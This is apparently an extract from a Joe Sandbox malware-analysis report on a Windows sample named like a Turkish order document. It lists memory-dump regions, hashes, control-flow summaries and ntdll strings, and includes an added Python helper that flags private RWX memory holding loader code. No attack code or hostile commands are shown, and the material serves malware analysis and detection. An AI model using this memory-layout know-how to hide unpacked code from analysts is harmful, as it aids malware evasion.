                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                  • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                  • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                                                  Execution Graph

                                                                  Execution Coverage:0%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:20.2%
                                                                  Total number of Nodes:114
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph: the 114-node list (one entry per function in the 32d00000 region, with its API-call count and library-call count; entry nodes via LdrInitializeThunk) is a raw graph dump that does not render in the extracted text and is not reproduced here.

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 3 32d735c0-32d735cc LdrInitializeThunk
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: fe6c357e3114b67e672b4b197a9a15e954a28d775ce7ec96831f28a7c46e4d93
                                                                  • Instruction ID: 9a14687b03066dfa4c6ee94e588f027231f6d4ad5742556e143420b71ace5074
                                                                  • Opcode Fuzzy Hash: fe6c357e3114b67e672b4b197a9a15e954a28d775ce7ec96831f28a7c46e4d93
                                                                  • Instruction Fuzzy Hash: CF90023164950812D20072585654706100647D0301F65C412A042863CDC7A58A5565A2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 32d72b60-32d72b6c LdrInitializeThunk
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 2213e22be0dc61ccdfee670f50b2532ccd9ff3890559d9cffba3e899eabda11b
                                                                  • Instruction ID: 567bd14159241e5e07c36cd4353885bf5bfa9df130615ba2a8e88c2c4338850c
                                                                  • Opcode Fuzzy Hash: 2213e22be0dc61ccdfee670f50b2532ccd9ff3890559d9cffba3e899eabda11b
                                                                  • Instruction Fuzzy Hash: F090026124640413420572585554616400B47E0301B55C022E1018674DC53589956125

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1 32d72c70-32d72c7c LdrInitializeThunk
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a850b85b417947b495d68797135c41a11eda42bb13ffdc7dff7255d26f089085
                                                                  • Instruction ID: 5450738919a285eea4731224aabec6f07075f89aca693fd942c18e4ea0246e13
                                                                  • Opcode Fuzzy Hash: a850b85b417947b495d68797135c41a11eda42bb13ffdc7dff7255d26f089085
                                                                  • Instruction Fuzzy Hash: E690023124548C12D2107258954474A000647D0301F59C412A442873CDC6A589957121

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2 32d72df0-32d72dfc LdrInitializeThunk
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 8b10b4dcdfd4a50e01545fcd86ab42acc4b6bc5b405129fc303d17d634ee8be6
                                                                  • Instruction ID: 48ef859fc7585821f23b148b21779650f2a659a2fc5a24cd5a18681cec0b87ae
                                                                  • Opcode Fuzzy Hash: 8b10b4dcdfd4a50e01545fcd86ab42acc4b6bc5b405129fc303d17d634ee8be6
                                                                  • Instruction Fuzzy Hash: 0B90023124540823D21172585644707000A47D0341F95C413A042863CDD6668A56A121
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2160512332
                                                                  • Opcode ID: 5328667da4d3084c1ef5e010b8625d5576332cd7b64dade22cd453bf69024a5c
                                                                  • Instruction ID: fdb151fbf65dc028763d7cee6b904f908bd4f2d78ce50f2a8ae7d91ee588b211
                                                                  • Opcode Fuzzy Hash: 5328667da4d3084c1ef5e010b8625d5576332cd7b64dade22cd453bf69024a5c
                                                                  • Instruction Fuzzy Hash: 97928E76608381AFEB20CE24C894B5BB7E8BF88754F50491DFA96D7750DB70D844CBA2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 555 32dd94e0-32dd9d27: basic-block edge list (nodes 555-693; calls to 32d79020, 32dd8513, 32dda808, 32df972b, 32dddc65, 32d74c30 and 32dd9d2a; GetPEB and RtlDebugPrintTimes referenced) is a raw graph dump that does not render in the extracted text and is not reproduced here.
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $ $0
                                                                  • API String ID: 3446177414-3352262554
                                                                  • Opcode ID: a6091cfe7df66e92c957b4de7d31829a25159983533bc919c34085ef034e744d
                                                                  • Instruction ID: f31df541de9866ef07a2d13a18e6b8cdaefedc4c9e7db19f3cd3ca360e4f0dc7
                                                                  • Opcode Fuzzy Hash: a6091cfe7df66e92c957b4de7d31829a25159983533bc919c34085ef034e744d
                                                                  • Instruction Fuzzy Hash: D13215B56087819FE310CF68C480B9BBBE5BF88348F10492DF59A87350DB76E949CB52
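
                                                                  Added example (editor's code, not part of the Joe Sandbox report): a Python helper that decodes the two machine-generated artefacts repeated in the entries on this page, the .sdmp memory-dump name in "Memory Dump Source" and the flattened control_flow_graph text. The meaning of the .sdmp name fields is an assumption: the three hex fields after the 16-digit base address (00000040, 00001000, 00020000 here) line up with MEMORY_BASIC_INFORMATION Protect, State and Type, which would make the 32D00000 region PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE. Read together with "based on PE: true" and the ntdll-internal strings listed for this region (RtlReAllocateHeap debug text, minkernel\ntdll\ldrinit.c), that is the check an analyst runs to tell a privately allocated copy of loader code from the image-backed module mapping normally expected. The CFG parser recovers which basic blocks call GetPEB or RtlDebugPrintTimes and how many call sites each internal subroutine has. The dump name and the CFG excerpt embedded below are copied from this page; the field layout, class and function names are the example's own.

```python
"""Decode a Joe Sandbox .sdmp dump name and a flattened control_flow_graph dump.
Added example, not Joe Sandbox code. ASSUMPTION: the .sdmp name is
<process>.<stage>.<dump id>.<base>.<Protect>.<State>.<Type>.<unused>.sdmp with the
three hex fields holding MEMORY_BASIC_INFORMATION values (inferred, not documented)."""
import re
from dataclasses import dataclass, field

# winnt.h constants for the three MEMORY_BASIC_INFORMATION fields.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
_SDMP_RE = re.compile(r"^([0-9a-f]{8})\.([0-9a-f]{8})\.(\d+)\.([0-9a-f]{16})"
                      r"\.([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]{8})\.[0-9a-f]{8}\.sdmp$", re.I)
_HEX_RANGE_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{8})?$", re.I)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    stage: int
    base: int
    protect: str
    state: str
    mem_type: str

    @property
    def rwx_private(self) -> bool:
        """Committed, private (not image-backed) and RWX: the shape of unpacked or
        manually mapped code, unlike a DLL loaded by the image loader (MEM_IMAGE)."""
        return (self.protect == "PAGE_EXECUTE_READWRITE" and self.state == "MEM_COMMIT"
                and self.mem_type == "MEM_PRIVATE")


def parse_sdmp_name(name: str) -> DumpRegion:
    m = _SDMP_RE.match(name.rsplit("/", 1)[-1])
    if not m:
        raise ValueError(f"not a .sdmp dump name: {name}")
    proc, stage, _dump_id, base, prot, state, mtype = m.groups()
    prot_v = int(prot, 16) & 0xFF  # low byte; PAGE_GUARD and friends live above it
    return DumpRegion(int(proc, 16), int(stage, 16), int(base, 16),
                      PAGE_PROTECT.get(prot_v, f"0x{prot_v:x}"),
                      MEM_STATE.get(int(state, 16), state), MEM_TYPE.get(int(mtype, 16), mtype))


@dataclass
class Block:
    node_id: int
    addr_range: str                              # "start-end" or a single address
    apis: list = field(default_factory=list)     # named API calls, e.g. GetPEB
    calls: dict = field(default_factory=dict)    # internal callee address -> call sites


def parse_cfg(text: str):
    """Grammar seen in the dump: node = '<id> <start>[-<end>]' then annotations
    (API name, 'call <addr>', '* <n>' repeat count) until the next node or edge;
    edge = '<src>-><dst>'. Returns ({node_id: Block}, [(src, dst), ...])."""
    toks, blocks, edges = text.split(), {}, []
    cur, last_call, i = None, None, 0
    while i < len(toks):
        t = toks[i]
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if "->" in t:
            src, dst = t.split("->", 1)
            edges.append((int(src), int(dst)))
        elif t.isdigit() and _HEX_RANGE_RE.match(nxt):
            cur = Block(int(t), nxt)
            blocks[cur.node_id], last_call = cur, None
            i += 1
        elif t == "call" and cur is not None and nxt:
            cur.calls[nxt] = cur.calls.get(nxt, 0) + 1
            last_call = nxt
            i += 1
        elif t == "*" and last_call is not None and nxt.isdigit():
            cur.calls[last_call] += int(nxt) - 1   # 'call X * n' means n call sites
            i += 1
        elif cur is not None and t != "control_flow_graph":
            cur.apis.append(t)
        i += 1
    return blocks, edges


def api_blocks(blocks, api: str):
    """Address ranges of the basic blocks that call a named API."""
    return [b.addr_range for b in blocks.values() if api in b.apis]


def call_targets(blocks):
    """Internal callee address -> total call sites across the function."""
    totals = {}
    for b in blocks.values():
        for addr, n in b.calls.items():
            totals[addr] = totals.get(addr, 0) + n
    return totals


# Constructed sample input: the dump name and an excerpt (nodes 764-770, 797, 805, 806)
# of the control_flow_graph text from this page.
SAMPLE_DUMP = "00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp"
SAMPLE_CFG = ("control_flow_graph 764 32d68620-32d68681 765 32d68687-32d68698 764->765 "
              "766 32da5297-32da529d 764->766 766->765 767 32da52a3-32da52b0 GetPEB 766->767 "
              "767->765 768 32da52b6-32da52b9 767->768 769 32da52bb-32da52c5 768->769 "
              "770 32da52d6-32da52fc call 32d72ce0 768->770 769->765 797 32da5443-32da5494 "
              "805 32da54ce-32da5512 call 32d2fd50 * 2 797->805 806 32da5496-32da54cc "
              "call 32d2fd50 797->806")
```

Run it as a module and call parse_sdmp_name(SAMPLE_DUMP) and parse_cfg(SAMPLE_CFG); on the values from this page the region decodes as PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE, GetPEB is called from block 32da52a3-32da52b0, and 32d2fd50 has three call sites because the dump's "call 32d2fd50 * 2" counts as two. Any Protect field with a value above 0xFF keeps only its low byte here, so PAGE_GUARD or PAGE_NOCACHE regions still decode to their base protection.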

                                                                  Control-flow Graph
                                                                  • Control-flow graph (rendered graph omitted): function at 32d68620, basic blocks 32d68620 to 32d68698 and 32da5297 to 32da5568. Named calls: GetPEB. Internal subroutine calls: 32d72ce0, 32d354a0, 32da556d, 32d2fd50, 32dba4b0.
                                                                  Strings
                                                                  • Thread identifier, xrefs: 32DA553A
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 32DA54E2
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 32DA54CE
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 32DA540A, 32DA5496, 32DA5519
                                                                  • undeleted critical section in freed memory, xrefs: 32DA542B
                                                                  • corrupted critical section, xrefs: 32DA54C2
                                                                  • Invalid debug info address of this critical section, xrefs: 32DA54B6
                                                                  • 8, xrefs: 32DA52E3
                                                                  • Critical section address, xrefs: 32DA5425, 32DA54BC, 32DA5534
                                                                  • Address of the debug info found in the active list., xrefs: 32DA54AE, 32DA54FA
                                                                  • Critical section debug info address, xrefs: 32DA541F, 32DA552E
                                                                  • Critical section address., xrefs: 32DA5502
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 32DA5543
                                                                  • double initialized or corrupted critical section, xrefs: 32DA5508
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: 4ce0e3a0bf5252b1c3125f5c4e98eeb3e04c33e05a82c369b90264ceadaeccd8
                                                                  • Instruction ID: 25f84ea0807695df0cbdbe170897a655f139e8e572bf1ae8f9e1bee4c6358972
                                                                  • Opcode Fuzzy Hash: 4ce0e3a0bf5252b1c3125f5c4e98eeb3e04c33e05a82c369b90264ceadaeccd8
                                                                  • Instruction Fuzzy Hash: 9E8165B0E00358EFEB50CF94E840FAEBBB5AB48718F604199E944B7780D775A949CB60

                                                                  Control-flow Graph
                                                                  • Control-flow graph (rendered graph omitted): function at 32de0274, basic blocks 32de0274 to 32de0760. Named calls: GetPEB, RtlDebugPrintTimes. Internal subroutine calls: 32d87e54, 32d276b2, 32de0766, 32d2b970, 32de0cb5, 32d3ffb0, 32d2758f, 32d427f0, 32de11a4, 32d63bc9, 32dedac6, 32dd86ba, 32d5fe99.
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                  • API String ID: 3446177414-1700792311
                                                                  • Opcode ID: 4c051e89c94b8efa16feb914cc1ecde59b5c6bdd4fb33f39d5929897683cb567
                                                                  • Instruction ID: 9752548299aa05b0c95d24005f25ce0d6896f6dd491366416acdd0fff1d8a7b5
                                                                  • Opcode Fuzzy Hash: 4c051e89c94b8efa16feb914cc1ecde59b5c6bdd4fb33f39d5929897683cb567
                                                                  • Instruction Fuzzy Hash: ABD1CAB5500785DFDB02DF68E440AADBBF1FF4A709F448049E886AB761CB749985CF20
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                  • API String ID: 0-3591852110
                                                                  • Opcode ID: c32023af11bc547fc21dff5d495b59e6657b71b55522b47d6e413e4b0d2010e8
                                                                  • Instruction ID: bccecbaa166ae73983b89e5edc58c512bff78dd9530674b1294c48d7e889af75
                                                                  • Opcode Fuzzy Hash: c32023af11bc547fc21dff5d495b59e6657b71b55522b47d6e413e4b0d2010e8
                                                                  • Instruction Fuzzy Hash: BF1278B4600742EFE7158F24C481BAAFBE1FF09B18F548499E8968B751DB74EC85CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                  • API String ID: 0-3532704233
                                                                  • Opcode ID: cf919e77dc42d024b1ec6c295f619c008ce72ffa3a715a5a61bac278cb894fe5
                                                                  • Instruction ID: 984191a555a8bd48982b24fe8f96dac9cdba3ab677c4d115fe885437a0b4daed
                                                                  • Opcode Fuzzy Hash: cf919e77dc42d024b1ec6c295f619c008ce72ffa3a715a5a61bac278cb894fe5
                                                                  • Instruction Fuzzy Hash: FBB1BCB25083959FD715CF28C480B5BB7E8AF88748F41492EF888D7314DBB0D949CBA2
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 3446177414-3570731704
                                                                  • Opcode ID: 68aeb8607e1da6e2999f6d2030fd7d3db796eecc7791813074a97310fa3a025e
                                                                  • Instruction ID: dee48f852660071c359282f9898224fb1ffdc1fa5cb7da50db4e1080c02e6b4a
                                                                  • Opcode Fuzzy Hash: 68aeb8607e1da6e2999f6d2030fd7d3db796eecc7791813074a97310fa3a025e
                                                                  • Instruction Fuzzy Hash: DA925675A01368CFEB24CF29C880B99B7B1BF45754F1581EAE949A7380DB709E80CF61
                                                                  APIs
                                                                  • RtlDebugPrintTimes.NTDLL ref: 32D5D959
                                                                    • Part of subcall function 32D34859: RtlDebugPrintTimes.NTDLL ref: 32D348F7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-1975516107
                                                                  • Opcode ID: f74d3728e8994714b6c30a32131fbe6f4796c82b16284c9b7b93eea46fb5dc92
                                                                  • Instruction ID: 40866c3d865b3f32fb732193050398f26a22a12fde1c3b7014703c416cc3e6fd
                                                                  • Opcode Fuzzy Hash: f74d3728e8994714b6c30a32131fbe6f4796c82b16284c9b7b93eea46fb5dc92
                                                                  • Instruction Fuzzy Hash: 8751E075A003459FEF08DFA4C58178EBBB1BF48B18F614559D8526B388CBB4A885CFA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                  • API String ID: 0-3063724069
                                                                  • Opcode ID: 05377f8257abf2708844e88b00fc810ce2ee4bb7877443d97d27f6d44baee0cf
                                                                  • Instruction ID: 28c18e63e960e0137bb25e81ae14b0af371eaba881b14ae379d39bc04e8a6604
                                                                  • Opcode Fuzzy Hash: 05377f8257abf2708844e88b00fc810ce2ee4bb7877443d97d27f6d44baee0cf
                                                                  • Instruction Fuzzy Hash: ADD1D8B28483A5AFE721DB54C840BEBB7E8AF84754F404929F98597350DB74C948CBE2
                                                                  Strings
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 32D2D2C3
                                                                  • @, xrefs: 32D2D313
                                                                  • @, xrefs: 32D2D0FD
                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 32D2D0CF
                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 32D2D196
                                                                  • @, xrefs: 32D2D2AF
                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 32D2D146
                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 32D2D262
                                                                  Memory Dump Source
